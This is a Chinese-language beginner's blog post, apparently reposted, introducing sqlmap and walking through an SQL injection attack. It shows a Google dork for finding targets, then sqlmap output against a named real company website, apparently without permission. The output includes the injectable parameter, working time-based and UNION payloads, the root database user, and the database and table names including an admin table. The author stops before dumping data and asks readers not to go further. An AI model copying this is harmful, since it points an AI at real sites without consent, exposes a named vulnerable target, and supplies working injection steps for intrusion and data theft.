zoukankan      html  css  js  c++  java
  • sqlmap新手注入

    一 什么是sqlmap   

    1 sqlmap is an open source penetration testing tool that automates the
    2 process of detecting and exploiting SQL injection flaws and taking over of
    3 database servers. It comes with a powerful detection engine, many niche
    4 features for the ultimate penetration tester and a broad range of switches
    5 lasting from database fingerprinting, over data fetching from the 
    6 database,
    7 to accessing the underlying file system and executing commands on the
    8 operating system via out-of-band connections.

    sqlmap 是一个开源的自动探测和发现sql注入漏洞以及拿下数据库服务器的工具.它有一个强大的探测引擎,许多有些的特性支持探测服务器以及拿下数据库服务器.

    ** 简言之 sqlmap 是个拿站工具.

    二 安装.

      python 2.6 或2.7 ,mark 只是这两个主版本.sqlmap 安装可以用easy_install 或者用git clone 从仓库拿.

    三 寻站

      google hack 啊, inurl:".php?id=

      就试下第二个吧.www.cowinbio.com/about/index.php?id=1 

      开干

     1  blind (heavy query)' injectable
     2 [10:07:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
     3 [10:07:47] [INFO] automatically extending ranges for UNION query injection tech
     4 ique tests as there is at least one other (potential) technique found
     5 [10:07:49] [INFO] target URL appears to be UNION injectable with 2 columns
     6 [10:07:49] [WARNING] combined UNION/error-based SQL injection case found on col
     7 mn 1. sqlmap will try to find another column with better characteristics
     8 [10:07:49] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 c
     9 lumns' injectable
    10 GET parameter 'id' is vulnerable. Do you want to keep testing the others (if an
    11 )? [y/N] n
    12 sqlmap identified the following injection point(s) with a total of 2626 HTTP(s)
    13 requests:
    14 ---
    15 Parameter: id (GET)
    16     Type: AND/OR time-based blind

    然后

     1          _
     2  ___ ___| |_____ ___ ___  {1.0-dev-c6d4217}
     3 |_ -| . | |     | .'| . |
     4 |___|_  |_|_|_|_|__,|  _|
     5       |_|           |_|   http://sqlmap.org
     6 
     7 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu
     8  consent is illegal. It is the end user's responsibility to obey all applicabl
     9 local, state and federal laws. Developers assume no liability and are not resp
    10 sible for any misuse or damage caused by this program
    11 
    12 [*] starting at 10:15:04
    13 
    14 you provided 'MySQL' as a back-end DBMS, but from a past scan information on t
    15  target URL sqlmap assumes the back-end DBMS is 'mysql <5.0.11'. Do you really
    16 ant to force the back-end DBMS value? [y/N] y
    17 [10:15:22] [INFO] testing connection to the target URL
    18 [10:15:22] [WARNING] there is a DBMS error found in the HTTP response body whi
    19  could interfere with the results of the tests
    20 [10:15:22] [INFO] checking if the target is protected by some kind of WAF/IPS/
    21 S
    22 sqlmap resumed the following injection point(s) from stored session:
    23 ---
    24 Parameter: id (GET)
    25     Type: AND/OR time-based blind
    26     Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    27     Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))
    28 
    29     Type: UNION query
    30     Title: Generic UNION query (NULL) - 2 columns
    31     Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a7
    32 7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NU
    33 -- -
    34 ---
    35 [10:15:23] [INFO] testing MySQL
    36 [10:15:23] [INFO] confirming MySQL
    37 [10:15:23] [INFO] the back-end DBMS is MySQL
    38 web application technology: PHP 5.6.9
    39 back-end DBMS: MySQL < 5.0.0
    40 [10:15:23] [INFO] fetching current user
    41 current user:    'root@localhost'

    再之后

             _
     ___ ___| |_____ ___ ___  {1.0-dev-c6d4217}
    |_ -| . | |     | .'| . |
    |___|_  |_|_|_|_|__,|  _|
          |_|           |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
     consent is illegal. It is the end user's responsibility to obey all applicable
    local, state and federal laws. Developers assume no liability and are not respo
    sible for any misuse or damage caused by this program
    
    [*] starting at 10:16:44
    
    [10:16:44] [INFO] testing connection to the target URL
    [10:16:44] [WARNING] there is a DBMS error found in the HTTP response body whic
     could interfere with the results of the tests
    [10:16:44] [INFO] checking if the target is protected by some kind of WAF/IPS/I
    S
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: AND/OR time-based blind
        Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
        Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 2 columns
        Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a79
    7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NUL
    -- -
    ---
    [10:16:45] [INFO] testing MySQL
    [10:16:45] [INFO] confirming MySQL
    [10:16:45] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.6.9
    back-end DBMS: MySQL < 5.0.0
    [10:16:45] [INFO] fetching current database
    current database:    'cw'
    1 Database: cw
    2 [3 tables]
    3 +---------+
    4 | admin   |
    5 | news    |
    6 | product |
    7 +---------+

    就到这里吧. 毕竟是写博客.本人并没有再进一步深入,希望各位看官也不要再进一步尝试了.

    另外友情提醒这个站 ,你们不太安全.

    郑重声明以上文章本人原创,转载请标明出处. 小三爷 此处谢过了~~.

  • 相关阅读:
    列举ASP.NET 页面之间传递值的几种方式?
    Ajax 完整教程
    ajax 传值,Ajax: Asynchoronous Javascript and xml (异步的js和xml). 异步刷新,异步传递.替代表单提交数据,回调函数处理返回的数据
    Webform 翻页查询.最主要理解这一句代码 return _Context.ChinaStates.Skip((nowpage
    datalist 的用法。也是增删改查,但是比较智能。用数据绑定的方式,可以有不同的显示方法,下面是对一个表的增删改查的参考代码
    bzoj 2705: [SDOI2012]Longge的问题 歐拉函數
    bzoj 1096: [ZJOI2007]仓库建设 斜率優化
    HJA的异或值
    Contest 20140914 Mushroom写情书 字符串雙hash 後綴數組
    Contest 高数题 樹的點分治 樹形DP
  • 原文地址:https://www.cnblogs.com/liuyuxing/p/5018612.html
Copyright © 2011-2022 走看看